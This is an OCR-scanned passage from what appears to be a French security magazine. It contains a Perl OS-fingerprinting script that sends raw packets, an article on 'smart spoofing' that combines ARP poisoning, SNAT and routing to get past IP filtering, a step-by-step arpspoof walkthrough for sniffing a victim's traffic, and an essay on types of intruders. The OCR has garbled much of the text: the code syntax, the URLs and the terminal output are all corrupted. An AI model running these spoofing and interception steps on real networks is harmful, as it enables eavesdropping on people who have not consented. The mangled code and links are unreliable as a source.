use Socket; 

use Net::Pcapltils; # réception des paquets 


use NetPacket: :Ethernet qul:strip): 
use NetPacket: :1P quC:strip); 
use NetPacket: :TCP; 


##H#ht pcapinit && connexion Hit 


my Ssaddr = "192.168.0.184"; #1l faut adapter cette 
valeur 

my Sdaddr = "192,166.9.184"; # à votre config réseau 

my Ssport = 666; 

my Sdport = 21; 

my Sdevice = "ethÿ"; 

my $size = 15096; 

my Stimeout = ÿ 

my Stmp = 0; 

my iseq = 6566665; 

m Hfiltor ="; 

nt 

my C Xip, $tcp_obj ); 

my $0S = "inconnu"; 


Getüptions("interface=s" => \$device, "help" = 


\&infos, 
“cible=s" => \fdaddr, "port=s" = 
\Sdport) ; 

print " An'; 


print BOLD,"C OSdetect by DeLeTe J\n", RESET; 
print "\\ Ann"; 


my $a = new Net: 

my Spcap = $a -> 

pcapinit($devtce,sf{lter,$s1ze, Stimeout) 
or die "Echec de pcapinit()\n"; 


RawIP; 


Toop $pcap, -1,\8fingerprint, \[]; Sur P12 > 
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#4 Les fonctions #4 
sub fingerprint { 
&envoi_paquet() 1f($tmp = 8); 


ny ($vide, $pkt, fpaquet) = @ ; 
# Récupération des infos permettant la différenciation 
Sa->bset(substr(Spaquet, linkoffset (Spcap))); 


&ip_struct(sa->get({ 
Ap=Caw(ihl tos id frag-off tt1 check saddr daddr)] 
p}; 

Stop_pbj = 

NetPacket::TCP->decode({p_strip(eth_strip(#paquet))); 


# On analyse la réponse (si c'est le bon paquet) 
1f (SLcp_obj->{acknun) = $seq#1 

Ba Sip{"saddr®} eq Sdaddr 

&a Sipl'deddr"} eq Ssaddr) { 


# On lance notre arbre de recherche 
Af CSipC'ttI" A 88 SIpL'tE I" )>=M4) L 
48 (Step obj-{uinsize} — 32767) 
$0$ = “linux” : 
elsif (tcp obj->{winsize} — 65535) 
Sos = "Frecbsd" ; 
k 
elsif ($ip{'ttl"}<=128 &8 $ip{"itl"}>=98) { 
$0s = "windous" 1#(Step_obj->{uinsize} = 16615); 
} 


# On affiche les résuitats et on quitte 
4f($os eq "inconnu" ) { 
print BOLD, "Echec dans le processus 
d'identification". 
de Sdaddr,\n",RESET 1f($os eq "inconnu"}; 
print ‘\n-- Les valeurs retournées par Sdaddr 
sont:\n"; 
print "tt1 = ",RED,"Sip{ttl}\n",RESET; 
print ‘Taille de fenêtre =", 
RED,Stcp_obj-»{uinsize}, *\n",RESET; 
} else { 
print ‘Le système d'exploitation de Sdaddr". 
“semble être $os.\n"; 


} 
exit; 
} 
} 


sub ip_struct { 
Sip{'ihl"} = shift(@);  Sip{'tos"}) = shift(@_); 
Sip{'id"} = shift(@);  Sip{'frag off"} = shift(@_ 
Sip{'ttl"} = shift(@);  Sip{'check'} = shift(@_); 
Sip{"saddr"} = inet_ntoa(pack("N",shift(@ ))); 
Sip{'daddr"} = inet ntoa(pack('N",shift(é ))); 


} 
sub infos { 
printf("[s9] syntaxe : 


-i [--interface] : interface à utiliser 
-c [--cible] : hôte à identifier 
-p L--port] : un port ouvert 
-h L--heïp] : affichage de 'aide\n\n"); 
exit 


} 


sub envoi_paquet { 
my $b = nen Net::RawIP; 
$b->seti{ip={ saddr=$saddr, daddr=>fdaddr), 
icp=>{ source=$sport, dest=$dport, syn1l, 


seq=>$seq}})+ 
$b->send; 

print “Envoi du paquet: ‘; 
print RED, "COK]",RESET; 
print 


$tnp 


} 
HAE EOF #44 


Nous n'effectuons que deux tests sur le trl et la taille 
de la fenêtre pour différencier ces trois systèmes d'ex- 
ploitation. Les tests doivent se faire su un port ouvert que 


l'on peut spécifier avec l'option -p. 


Croot@localhost}# ./OSdetect -1 eth -c 192.168.9.191 -p 22 


Envoi du paquet : [OKI 
Le systène d'exploitation de 192.168.9.191 senble être Freebsd. 
La machine 192168.0.101 tourne effectivement sous 


freebsd et les tests sur Linux et Windows 2000 sont également 
concluants. L'inconvénient de ce petit programme est qu'il ne 
fonctionne que sur un lan, car certains routeurs modifient la 
valeur de la taille de fenêtre ce qui peut fausser les résultats. 
On voit donc ici qu'il est assez simple d'automatiser sa recher- 
che (surtout avec perl ;) et que l'on peut ajouter des tests en 


effectuant seulement quelques petites modifications. 
Les outils existants 


Nous allons décrire maintenant trois outils réalisant 
cette détection : queso, qui fut le premier outil public en 
matière de prise d'empreintes, nmap, qui lui est bien plus 
puissant et possède une base de signatures très importan- 
te et enfin Xprobe, qui est basé sur les techniques de pri- 


ses d'empreintes liées au protocole ICMP. 


Queso n'est plus développé depuis septembre 1998. Il 
n'a besoin que d'un port ouvert et il utilise une méthode 
de détection assez limitée, puisqu'il se base sur une série 
de if/else au lieu d'utiliser un fichier contenant une base 
de signatures. Au contraire, nmap est bien plus précis, car 
il ne se contente pas de déterminer quel système tourne 
sur une machine, mais pousse la précision jusqu'à la ver: 
sion du noyau (il fait par exemple la différence entre Linux 


2.4.x et Linux 2.2.x). 
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L'autre point fort de nmap est qu'il 
a la particularité de conserver les 
empreintes séparément du code, dans 
un fichier de signature. Il est donc sim- 
ple d'ajouter de nouvelles empreintes. 
D'ailleurs, quand nmap ne reconnaît 
pas un système, ce qui peut se produi- 
re lorsqu'il rencontre un routeur, il ren- 
voie l'empreinte de ce système qui se 
caractérise par une série de sept tests. 
On peut retrouver le fichier nmap-os- 
fingerprints parmi les fichiers installés. 
À l'heure où j'écris ces lignes, on peut 
voir qu'il existe plus de 1000 signatu- 
res, correspondant à toutes sortes de 
périphériques et systèmes : des rou- 
teurs, des switches, des modems, un 
grand nombre d'OS (y compris ceux des 
consoles de jeux, et quelques systèmes 
occultes), et même des imprimantes, 
nmap est très complet. Il est pour- 
tant difficile de différencier les piles 
des différentes versions de Windows, 
par exemple, Mais avec les options -5V 
-0 -À, on peut déterminer quelle est la 
version de Windows par rapport au ser- 
vice activé par défaut sur ceux-ci. 
Xprobe enfin, effectue sa détection en 
suivant un arbre de tests, ce qui permet 
d'obtenir de meilleurs performances. Son 
implémentation ainsi que son mode de 
fonctionnement sont décrits par son 
concepteur, Ofir Arkein, dans phrack 57. 


Prise d'empreintes passive 


Nous avons expliqué et montré à 
quel point la prise d'empreintes active 
est efficace. Mais l'envoi de paquets vers 


la machine cible peut facilement être | 


interprété comme une agression et 
déclencher un IDS. Par souci de discré- 
tion ou par politesse, on peut également 
faire de la détection d'OS en examinant 
seulement les paquets qui parviennent 
normalement jusqu'à nous. 


Méthodologie 


La prise d'empreintes passive est 
similaire à la méthode active, sauf que 
celle-ci n'envoie aucun paquet : elle est 
basée sur l'analyse des particularités 
des paquets fabriqués par une machi- 
ne distante en sniffant le réseau. 
Comme pour la méthode active, les dif- 
férences sont dues à des piles réseaux 
programmées différemment. 


Signatures passives 


On peut utiliser différents types de 
signatures, dont les principaux sont le 
TTL, la Windovr Size, la présence du bit 
DF et la valeur du champ TOS. Ces 
méthodes ont déjà été décrites plus 
haut, Les valeurs étant similaires, je ne 
vais donc pas les redéfinir. C'est en com- 
binant toutes ces méthodes que l'on 
peut générer des résultats assez fiables. 

Pour vérifier que vous avez bien come 
pris le principe de la prise d'empreintes 
passive, vous pouvez vous amuser à 
adapter le code d'OSdetect, cela ne vous 
demandera que quelques modifications. 


Les ouülls existants 


En matière de détection passive, la 
référence est pOf, un outil très puis- 
sant, car il regroupe un grand nombre 
de signatures. Son utilisation est sim- 
ple et il dispose de beaucoup d'op- 
tions. POf peut fonctionner en tant que 
daemon, ou utiliser les fichiers dump 
de libpcap (tepdump). La dernière ver- 
sion est disponible à cette adresse : 
tlp//lcemiulcoredump.ox/pOf gr. 

On peut aussi citer ettercap, qui 
utilise les empreintes de nmap. 


Prévention et protection 

On ne peut pas empêcher une per- 
sonne de vouloir détecter notre systè- 
me d'exploitation. On peut cependant 

induire en erreur ! Une solution pour- 
rait (pour les plus acharnés) consister 
à modifier la source de son système 
d'exploitation. L'inconvénient de 
cette méthode est qu'une petite erreur 
peut provoquer beaucoup de dégâts 
(j'en ai malheureusement fait l'expé- 
rience, ça ne pardonne pas en kernel 
land ;) . Au lieu de cela, on peut se 
contenter de modifier son ttl par 
défaut ou d'autres valeurs similaires. 
Avec le procfs de Linux, vous pouvez 
changer la valeur du fichier 
lproc/sys/met/pv4p_default_ttl . 

Sur Windows, il est également possi- 
ble de modifier les valeurs par défaut de 
quelques options réseau dans la base de 
registre. Par exemple sur Windows 2000, 
pour le ttl, il faut ajouter une entrée 
DefaultTTL avec une valeur comprise 
entre 1 et 255 dans HKEY LOCAL. 
MACHINE\System\CurrentControlSet\Se 
rvices\Tcpip\Parameters. 
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Les curieux qui veulent comprendre 
comment changer des valeurs par 
défaut de leur Windows 2000 peuvent 
Lire htp}//supportmieresoftcom/defaulaspe?scid-HEN- 
U5120542 . Pour d'autres systèmes tels que 
freebsd, il est possible de modifier tou- 
tes ces valeurs directement à partir de 
sysctl. 


Conclusion 


Nous avons fait le tour des princi- 
pales méthodes d'identification des 
systèmes d'exploitation. À l'heure 
actuelle, des outils puissants permet- 
tent d'obtenir des résultats précis. De 
plus, on peut imaginer que d'autres 
protocoles peuvent eux aussi faciliter 
la différenciation des systèmes d'ex- 
ploitation, de nombreuses pistes de 
recherche peuvent être prometteuses. 
Vous avez maintenant les connaissan- 
ces nécessaires pour effectuer vos pro- 
pres Lests et faire avancer la 
communauté | 


Quelques liens utiles : 


« Pour télécharger les outils 
Xprabe 
htlp}//wvsys-securip.com/himl/ projects/Xhtml 
nmap 
http;//rnwrinsecurs.org/nmap/nmap_dovnload.htrl 
queso 
http; securibfocus.com/data/toals/auditng/n 
etvork/queso-980622.tor.gz 
p0f 
htpi//icemtulcoredump.cx 
ettercap 
üp://ettercap.sourceforge.net 
+ Des articles intéressants sur le sujet 
Phrack 54: prise d'empreintes à partir de 
TCP/IP 
htip://wv phrack.org/show php?p=548a-9 
Phrack 57 : prise d'empreintes à partir d'ICMP 
ti://mvu phrack.ors/show php'p-578a-7 
Un autre papier sur ICMP 
Hp://ww.ss- 
secuit/com/archive/papers/ICMP_ Scanning v3.0.pdf 
+ Pour mieux comprendre le code 
hétp;//cpan uvimipeg.ca/htdoos/Net- 
RawlP/Net/RamiPhrri 
hüp;//cpan.uvimipeg ca/htdocs/NetFacket/TCPhim 


Merci à paparo0t et Crazytux 
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Smart spoofing 


Les techniques de spoofing IP 
classiques sont bien connues, 
Néanmoins une attaque de ce 
type, puissante, tend à rester 
dans l'ombre, bien qu'elle ne soit 
pas si récente. Le smart spoofing 
est pourtant facile à mettre en 
œuvre, et met en évidence les 
faiblesses des protocoles actuels 
du Net, en déjouant 
l'identification et le filtrage par 
adresse IP 


NIVEAU 


Après un bref rappel sur le 
protocole ARP le spoofing et le 
filtrage IP, nous verrons en détail 
les caractéristiques du smart 
spoofing grâce à une brève 
étude de cas. Nous verrons ensui- 
te quelles sont les méthodes 
existantes pour se protéger 
d'une telle attaque. 


Le filtrage IP 


Comme son nom l'indique, le 
filtrage IP consiste à filtrer le 
trafic des communications, sans 
tenir compte des services utili- 
sés, entre des équipements (rou- 
teurs, simples machines) ou des 
applications reliés. En pratique, 
ce filtrage consiste à mettre en 
place des règles de contrôle 
d'accès des adresses IP source 
des paquets entrants, en exami- 
nant les datagrammes un à un. Il 
est alors possible de comparer 
les adresses IP source à une liste 
d'adresses autorisées et, selon le 
cas, le paquet peut être accepté 
ou rejeté. 


Le filtrage IP permet égale 
ment le cloisonnement des 
réseaux. Ainsi une machine ne 
pourra, par exemple, dialoguer 
qu'avec une ou plusieurs autres 
machines bien déterminées. 


Il faut savoir que le filtrage 
IP ne se résume pas à un filtra- 


| ge au niveau de la couche IP, 


mais aussi au niveau de la cou- 
che transport (TCP, UDP) où les 
flags, les numéros de ports, voire 
les séquences de paquets sont 
vérifiés ; ainsi qu'au niveau 
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applicatif (nécessitant un passa 
ge par proxy), où la validité du 
protocole et certains éléments 
(par exemple les ActiveX sur 
une page HTML) sont contrôlés. 
Je ne m'étendrai pas sur les 
deux derniers types de filtrage, 
ceux-ci n'étant pas le but de cet 
article. 


Le protocole ARP sujet 
au Spoofing 


Comme chacun sait, le modè- 
le OSI comporte sept couches 
abstraites représentant les dif- 
férents services nécessaires au 
bon fonctionnement d'un réseau 
Parmi celles-ci, on s'intéressera 


on, qui sert d'interface 
entre la carte réseau et le mode 
d'accès, et la couche réseau, 
gérant l'adressage logique et le 
routage, 


Le protocole ARP (RFC 826) 
permet une correspondance 
dynamique entre les adresses 
physiques (de niveau 2) et 
logiques (de niveau 3). Ainsi, un 
émetteur connaissant l'adresse 
logique (typiquement l'adresse 
IP) du destinataire pourra obte- 
nir facilement son adresse phy- 
sique (l'adresse MAC de son 
interface). 


Le protocole ARP ne prenant 
pas en compte les aspects d'au- 
thentification des machines, il 
est simple de modifier les asso 
ciations d'adresses et de réaliser 


les 
lif. 


Smart spoofing 


un Man In The Middle. Cette attaque 
consiste à usurper l'adresse d'une 
machine afin d'intercepter les données 
qui lui étaient destinées, tout en ren- 
voyant le trafic, peut-être modifié, de 
manière transparente (voir l'article 
suivant pour un exemple pratique). 


Le spoofing est une méthode d'at- 
taque ancienne et très répandue 
visant à émettre des paquets trafiqués, 
afin de faire croire au destinataire 
qu'ils proviennent d'ime autre machi- 
ne [1]. L'utilisation de ces protocoles 
peu sécurisés a permis la naissance de 
nombreux types d'attaques tels le 
spocfing, l'ARP cache poisoning, le 
smart spoofing, etc. 


L'ARP cache poisoning 


Cette méthode d'attaque consiste 
à modifier la table de routage de 
niveau 2. Tous les systèmes d'exploita- 
tion sont vulnérables à ce genre 
d'attaque à cause du peu de sécurité 
qu'offre le protocole ARP (comme dit 
précédemment et à cause de mauvai- 
ses implémentations sur Les systèmes 
[2)). L'article suivant celui 
une attaque de ce type. 


Le smart spoofing 


Entrons à présent dans le vif.du 
sujet. Le smart spoofing est la réuni- 
on de trois techniques, à savoir le cache 
poisening, la translation d'adresse IP 
(modification de l'adresse source des 
paquets) et le routage IP. 


Cette méthode “trois en un”, qui ne 
nécessite ni d'écoute du réseau cible 
(snif) ni l'envoi de paquets IP trafi- 
qués (packet forging), montre que les 
technologies basées sur le filtrage IP 
(routeurs, firewalls, TCP-wrappers, 
filtres intégrés dans la pile IP, GUI 
applicatifs, etc.) deviennent totale- 
ment désuètes. 


Prenons un cas général. Nous avons 
à notre disposition deux routeurs, R1 
et R2, deux machines distinctes, M1 et 
M2, et une machine pirate P, comme 
l'indique le schéma. 


Traffic normal 


Le pirate, qui 
aura activé le rou- 
tage pour éviter 
toute perte de 


remplir cette fonc. 
tion [6]. 


Nous nous retro- 
uvons alors dans le 
cas illustré par le 
second schéma : tous 
les paquets trans- 
itant entre M1 et M2 

2 passent tranquille- 
ment par P, sans que 
le détournement du 

RS réseau ne soit per- 

ceptible. 


paquets, opère tout Connection (Man 
d'abord un ARP Spoofée in th 
cache  poisoning F \ nEne 
sur le routeur R1 Traffic 2 QE) 
(et uniquement détourné 

celui-ci,  l'ARP M1 EL: he \ 

cache  poisoning s M2 


sur R2 est inutile), 
afin d'insérer dans 
la chaîne de rou- 
tage de niveau 2 
les paquets navi- 
guant entre M1 et 
M2. L'ARP cache poisoning peut être 
réalisé avec l'outil Arp-sk [3], dont l'u- 
tilisation est détaillée dans le READ- 
ME fourni. 


Notre pirate doit alors s'occuper des 
ICMP redirect. Ceux-ci agissant seule- 
ment au niveau 3 et le routage étant 
effectué au niveau 2, ils ne sont pas un 
obstacle à l'attaque, mais il est préféra- 
ble de les bloquer sur la machine pira- 
te afin d'éviter de laisser trop de traces. 


Ensuite, le pirate fait en sorte que 
R2 n'envoie pas de requêtes ARP de 
broadcast vers d'autres machines afin 
d'éviter le repositionnement de la véri- 
table adresse de R2 dans le cache de 
R1. Pour cela, le pirate doit remplir de 
fausses corrélations dans le cache ARP 
de R2, et ce pour l'intégralité des 
adresses IP des machines susceptibles 
de se trouver sur le réseau. L'outil Arp- 
fillup semble le plus approprié pour 
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À présent, le pirate doit instaurer 
du SNAT (translation d'adresse IP 
source avec iptables sous Linux) sur 
P pour que les connexions vers M1 
contiennent l'adresse source de M2 
et pour que les paquets de retour 
soient renvoyés directement dans la 
pile IP de la machine pirate. 


La mise en place de l'attaque se 
termine par l'accès de P à M1, sous 
l'identité de MZ à l'aide d'un logiciel 
client lancé sur la machine pirate, ou 
sur une autre machine pirate se 
situant sur le réseau propre à P. 


Nous pouvons alors constater que 
le filtrage IP ne constitue tout au 
plus qu'un frein virtuel aux manipu- 
lations d'adresses et donc aux 
attaques du type spoofing IP, et qu'il 
est nécessaire de sécuriser les 
réseaux en utilisant d'autres tech- 
niques. 
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Peut-on se protéger d'une telle 
attaque ? que 


Le filtrage IP n'a jamais permis une 
quelconque sécurité à un système 
donné. Comme Le protocole ARP n'a 
pas implémenté de système d'authen- 
tification fort lors de sa création, le 
problème de sécurité réside dans la 
couche de niveau 2 et l'on doit donc 
régler les problèmes de sécurité à des 
niveaux supérieurs. 

À l'heure actuelle, seule l'utilisa- 
tion de protocoles cryptographiques 
tels IPsec, SSH, SSL ou les VPN, 
permet une sécurité du réseau. 

Des outils comme Arp-watch (man 
arpwatch), qui centralisent les associa- 
tions d'adresses IP/MAC et permettent 


un contrôle en temps réel du trafic 
ARP, peuvent aider à une veille plus où 
moins active de la sécurité d'un réseau. 


L'arrivée de l'IPV6 face au spoofing 


Le nouveau mode d'adressage 
induit par l'arrivée de l'IPv5 (RFC 
1752, 1883, 1933...) risque de poser 
quelques problèmes aux pirates fans 
du spoofing, En effet, l'IPv6, qui gère 
nativement QoS et Ipsec, est doté d'un 
système de sécurité selon deux axes : 


1.1Pv6 Authentification Header 
corrélatif à l'identification de la 
source des données et s'appuyant 
sur l'algorithme de signature MDS 


(Message Digest 5), permet d'écar- 
ter les attaques de type IP spoofing 
ou host masquerade, 

2. 1Pv6 Encapsulating Security Header 
: permet la confidentialité des infor- 
mations elles-mêmes et vise à chiff- 
rer la partie Data de l'ensemble des 
paquets IP avec l'algorithme 
DESCRC (Data Encryption Standard 
Cipher Bloc Chaining). 


Le déploiement de l'IPv6 semble 
donc être un obstacle conséquent aux 
attaques réseau basées sur le spoofing 
TP, mais d'ici à la couverture mondiale 
des réseaux par l'IPv6, de nouvelles 
techniques de piratage auront certai- 
nement fait surface. 


Attaques par Arp 
Spoofing en pratique 


Nous allons mettre en pratique 
un peu de la théorie présentée 
dans l'article précédent : 

cet article montre 

comment réaliser 

une attaque sur la cache arp 
du réseau local d'une victime 
imaginaire pour en détourner 
et sniffer le trafic sortant. 


D ES [ ww | 


16 


Access Control). 
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Le protocole ARP implémen- 
te le mécanisme de résolution 
d'une adresse IP en une adresse 
MAC ethernet. Les communica- 
tions réseau sont effectuées par 
échange des trames ethernet au | has ?). Seule la machine ayant 
niveau de la couche de liaison 
de données. Afin de réaliser | répond à la machine émettrice 
l'échange de données, les cartes 
réseau doivent posséder une 
adresse unique au niveau ether- 
net : l'adresse MAC (Media 


L'adresse MAC d'une machi- | détient 
ne destinataire doit être connue 
de la machine émettrice de | l'adresse IP destination des 
paquets lorsque cette dernière 
désire lui envoyer un paquet IP. | Cette correspondance va rester 
Afin de connaître cette adresse 
de destination, la machine émet- 
trice envoie une requête ARP en | charger inutilement le réseau à 
broadcast à chaque machine du 


réseau physique local. 

On pourrait assimiler cette 
requête ARP à une question 
: "Quelle est l'adresse 
e a cette IP ?! (who- 


l'adresse IP correspondante 
de le demande par un paquet 
ARP contenant l'adresse MAC 
correspondante à son IP (ap 
reply : issat). À partir de ce 
moment, la machine source 
l'adresse MAC de 
la machine correspondant à 


paquets qu'elle doit envoyer. 


quelque temps dans un cache 
| (le cache ARP) afin d'éviter de 


chaque envoi. 


Er 
tr 


Smart spoofing 


L'attaque que nous allons mettre en 
pratique vise à corrompre ce cache 
ARP de la machine victime, Plus en 
détail, le pirate va envoyer des paquets 
de réponse ARP à la machine cible 
indiquant que l'adresse MAC de la 
machine de retour du paquet (ou d'une 
machine intermédiaire) est la sienne. 

Ainsi, le pirate va recevoir tout le tra- 

fic destiné initialement à une certaine 

machine. Il va donc ensuite écouter 
passivement le trafic (ou le modifier) 
et rediriger (router) ensuite les paquets 
vers la machine de destination initiale. 

Pour réaliser une attaque par ARP 

Spoofing, il faut : 

+ un réseau d'au moins deux machines 
+ une machine pirate (de préférence 
sous Unix/GNU-Linux, 
notre tâche en sera sim- 
plifiée), possédant des |1 
cartes réseau ayant une | Réponse 1. 
adresse MAC (c'est 
généralement le cas), 

eun générateur de paquets ARP 
comme ARPspoof, Ipsorcery, Gspoof, 
Nemesis, etc. (disponibles sur 
tp; wGHBK ret/nols/PackexGeneraon ), 

+ des outils Arp, Traceroute (générale- 
ment installés sur Les Unix/linux par 
défaut), 

« l'accès root sur la machine cible (je 
vous laisse vous débrouiller ; c'est 
seulement nécessaire pour vérifier 
les effets de l'attaque) et la nôtre (il 
serait embêtant de ne pas l'avoir...). 


Voici la situation : la machine vic- 
time (target) possède l'adresse locale 
192.168.1.3, la passerelle par défaut 
est 192.168.1,1 et l'adresse de notre 
machine (3v1l) est 192.168.1.42. 


Voyons la passerelle utilisée par la 
victime avant notre attaque : 


[rootêtarget:-] traceroute 192.168.1.1 
traceroute to 192.168.1.1 (192.158.1.1), 
1 192.168.1.1 (192.168.1.1) .224 ns 9 

Et reégardons le cache de la 
machine cible : 


[root@target:-] arp 


Address Hutype  Hvaddress 
192.168.1.1 ether 
192.168.1.42  ether 


(Nous voyons ici la liste des machi- 
nes présentes sur le réseau et leur 
adresse MAC.) 

Notre machine pirate doit être 
capable de router les paquets IP d'une 
machine à l'autre, sinon le trafic entre 
ces deux machines ne pourra être éta- 
bli et notre attaque sera détectée ! 
Pour ce faire, on doit vérifier que l'ip 


Eroot@target 1 arp 


activé. Si vous utilisez l'ipv4, faites : 


Eroot@piratz:-] cat /proc/sys/net/ipv4/ip_forward 


, C'est bon :) 


Ensuite, nous lançons (dans le rôle 
du pirate) notre outil générateur de 
paquets, ARPspoof : 

Les paquets que nous venons d'en- 


2:04: 06:AD:55:B6 
arp reply 192.168.1.1 is-at & 
S:OA:06:AB:55:B6 D:60:B:de:64: 
arp reply 192.168.1.1 is- 
9:04: c6:AB:55 :B6 
arp reply 192.168.1.1 is-at @ 
C1 


30 hops max, 38 byte packets 


«llns 9.699 ns 
Flégs Mask Iface 
€ eth0 
€ ethg 
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voyer sont des paquets corrompant le 
cache ARP de la machine victime 
(192.168.1.3) avec des ARP Reply lui 
indiquant que l'adresse MAC associée 
à 192.168.1.1 est désormais 
0:0A:c6:AB:55:B6. 

Regardons de nouveau le cache 
ARP de la machine victime : 

Vérifions à présent le passage du 


Adûress Hutype  HhAddress Flags Mask [face 

192.168.1.1 ether 00:0A!C6:AB:55:B6 (a eth0 

192.168.1.42  ether A:HA:CE:AB:E2B6 € athf 
forwarding de notre machine est | trafic par la machine pirate 


192.168.1.42 en refaisant un tracerou- 
te vers la passerelle 192.168.1.1: 
Nous sommes maintenant capables 


[rootôtarget:-] traceroute 192.168.1.1 

traceroute to 192,168.1.1 (192.168.1.1), 39 hops max 
1 192.168.1.42 (192.168.1.42) 0.191 ms 
2 192.168.1.1 (192.168.1.1) 


9.184 ms 
1.078 ms 


9.094 ms 
1.413 ms 1.333 ms 
de sniffer le trafic de la machine cible 
vers la passerelle, dont les communi- 
cations sortantes vers Internet, par 
exemple. 


froot@piratz:-1 arpspoof -r 192.168.1.3 192.168.1.1 
£896 42: \ 
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Qui sont les intru 


Les intrusions informatiques ne sont pas toujours le fait d'un hacker 
désintéressé qui mettrait en pratique ses talents par curiosité. Au contraire, il 
existe des catégories d'intrus beaucoup plus redoutables, que cet article tente de 
détailler. Connaître son ennemi est essentiel si l'on veut pouvoir évaluer 
correctement les risques encourus. 


SL INTERNET EST L'AUTOROUTE DE L'INFORMATION, 
IL S'AGIT SURTOUT D'UNE AUTOROUTE SANS LES 
ELISSIÈRES DE SÉCURITÉ | 


Ces dernières années, Internet a 
pris un tel essor que l'on peut diffici- 
lement envisager ce qu'il pourrait se 
passer en cas d'arrêt immédiat du sys- 
1ème, 


On n'ose pas penser, et surtout on 
ne veut pas imaginer le chaos que cela 
produirait sur l'ensemble de la planè- 
te, car Internet est constitué d'un 
ensemble d'utilisateurs tellement 
disparate touchant toutes les profes- 
sions, tous les peuples, tous les statuts 
sociaux, bref pratiquement tous les 
humains, 


Et c'est bien là que se loge le pro- 
blème. Internet est ouvert au monde 
entier et comme dans la vie physique 
on trouve de tout parmi Les habitants 
de la terre. Il y a des personnes bien 
intentionnées qui respectent la liber- 
té de chacun et d'autres qui ne parta- 
gent pas tellement ce point de vue, 


Essayer de connaître les intrus 
d'Internet est pratiquement impossi- 
ble à réaliser, toutefois, il est tentant 
de définir quels sont les utilisateurs 
qui, d'une manière ou d'une autre, uti- 
lisent le système pour obtenir des 
informations censées rester en pos- 
session de leurs propriétaires. 


Il peut être prétentieux de classi- 
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fier les différents types d'intrus sur- 
fant régulièrement ou sporadique- 
ment sur Internet. Toutefois, leurs 
motivations étant tellement différen- 
tes, il est intéressant de mieux les 
connaître pour déterminer les risques 
que des entreprises ou des particuliers 
encourent. 


C'est dans ce sens que cet article 
abordera la situation. 


Lorsque l'on parle d'intrus, on 
pense tout de suite aux pirates infor- 
matiques, Mais il faut faire un tri 
parmi tous ces pirates informatiques, 
et ce en fonction de 


€ leurs objectifs, 

@ leurs possibilités techniques 
trusion, 

© leurs ressources et moyens finan- 
ciers, 

© leurs expériences et maîtrise, 

@ et surtout des risques encourus 
par les cibles. 


Le grand public assimilent trop 
souvent les hackers aux pirates infor- 
matiques. Et c'est un tort car, comme 
nous verrons dans cet article, les pira- 
tes les plus pernicieux ne sont pas 
nécessairement ceux que l'on croit 
Dans cette famille des pirates, on 
trouve de tout. Des bidouilleurs en 
quête de sensations fortes, des entre- 
prises à la recherche d'informations, 
des individus avides de gains finan- 
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ciers faciles et, dans la foulée, des 
organismes d'État. Bref, tout un petit 
monde qui, sous des couvertures 
diverses, exerce ses activités dans la 
plus grande simplicité. 


Mais commençons à nous intéres- 
ser à la femille la plus représentative 
des intrus, celle des hackers. 


Les hackers 


À l'origine, les hackers étaient 
considérés comme des pirates bien- 
veillants. Il s'agissait essentiellement 
de personnes qui s'intéressaient de 
très près aux systèmes informatiques 
et qui recherchaient, en priorité, les 
failles. À l'époque, on ne parlait pas 
encore de failles, car elles étaient tel. 
lement importantes et nombreuses, 
que l'on parlait pudiquement.. de 
lacunes, 


Actuellement, les hackers ont une 
image un peu moins reluisante malgré 
une séparation des activités survenue 
entre les crackers, qui ont pour but de 
casser du code et des protections, et 
les hackers, qui souhaitaient conser- 
ver une image d'origine. Mais la situa- 
tion est un peu confuse, car il existe 
une telle quantité de qualificatifs qu'il 
devient parfois difficile de s'y retro- 
uver. Toutefois, on peut schématiser La 
situation comme telle. 


Les hackers sont des personnes, 


il 


| 


CS 


:s- 


Qui sont les intrus du net 


douées de compétences particulières 
ou non, qui testent les limites des sys- 
tèmes, par curiosité intellectuelle ou 
par pur plaisir. Seul un faible pour- 
centage de ces hackers est véritable- 
ment très intelligent. Les vrais 
hackers ont des connaissances de base 
en matière de technologie et sont 
poussés par le désir d'apprendre. Il 
existe une certaine hiérarchie dans la 
connaissance qui peut, de manière 
rustique, être décrite de la manière 
suivante. 


Dans la catégorie des bidouilleurs, 
on peut citer les * Curious Joe ". Per- 
sonnes très curieuses de cet art et qui 
en connaissent toutefois suffisamment 
pour faire des dégâts. Ils veulent tes- 
ter leurs trouvailles et leurs outils sans 
intention foncièrement mauvaise, Sou- 
vent, par leur inexpérience, ils sont 
involontairement néfastes mais sont 
capables de pénétrer des réseaux et 
causer des dommages dans des entre- 
prises. Citons dans cette catégorie, les 
" Lamers " ou les " Script kiddies " 
qui sont tout aussi néfastes, car ils ne 
disposent que de peu de connaissan- 
ces en informatique. Ils reprennent 
par contre des connaissances de base 
et de scripts créés par de vrais hac- 
kers. Ils parlent beaucoup de leurs 
exploits qui se limitent souvent à de 
la théorie ! 


Dans la catégorie intermédiaire, on 
trouve les " Wannabes ". Nouvelles 
forces du hacking, ces intrus ont une 
véritable ambition de recherche de la 
connaissance et souhaitent devenir 
des élites essentiellement en amélio- 
rant des scripts de hacks existants. 
Une fois que ces wannabes dévelop- 
pent leurs propres scripts, ils devien- 
nent alors des " Élites ". 


Parmi les élites, il existe également 
plusieurs catégories, On trouve les " 


White Hats ", soit des particuliers, des 
consultants en sécurité, des adminis- 
trateurs réseaux ou parfois. des 
cyber policiers. Ils ont un sens de l'é- 
thique et de la déontologie et recher- 
chent dans le hacking un subtil 
mélange de défi, de jeu, de recon- 
naissance et d'argent. 


Les " Black Hats " constituent un 
autre sous-ensemble des élites, ce sont 
eux les véritables nuisances de la 
famille des hackers. Ce sont eux les 
cyber criminels, créateurs de virus, 
cyber espions, cyber terroristes et 
cyber escrocs, bref, les cyber négatifs 
de la corporation | 


Pour en finir avec les élites, on 
relève surtout l'existence de plus en 
plus nombreuse des " Grey Hats ", 
Position intermédiaire entre les deux 
catégories précédentes. Ils cherchent 
à pénétrer dans des systèmes mais ne 
veulent pas mettre le désordre. Par 
contre, ils prendront contact avec la 
cible pour lui faire part de leurs 
exploits. Travaillant essentiellement à 
l'affectif, les cibles ont tout intérêt à 
les écouter et prendre en compte leurs 
remarques, car les " Grey Hats " peu- 
vent se transformer très rapidement 
en " Black Hats ". Les cibles com- 
prendront alors la portée de " .….se 
transformer très rapidement ". 


Pour clore cet inventaire, citons 
encore les " Phreakers ", qui bricolent 
leurs lignes téléphoniques et créent 
de fausses cartes téléphoniques. Rele- 
vons aussi le “ carding ", encore plus 
illégal, qui consiste à utiliser des 
codes de cartes de crédit piratées, 
créés ou tout simplement volés. Dans 
le domaine de la reproduction illicite, 
mentionnons également les " Warez ", 
logiciels piratés accessibles sur des 
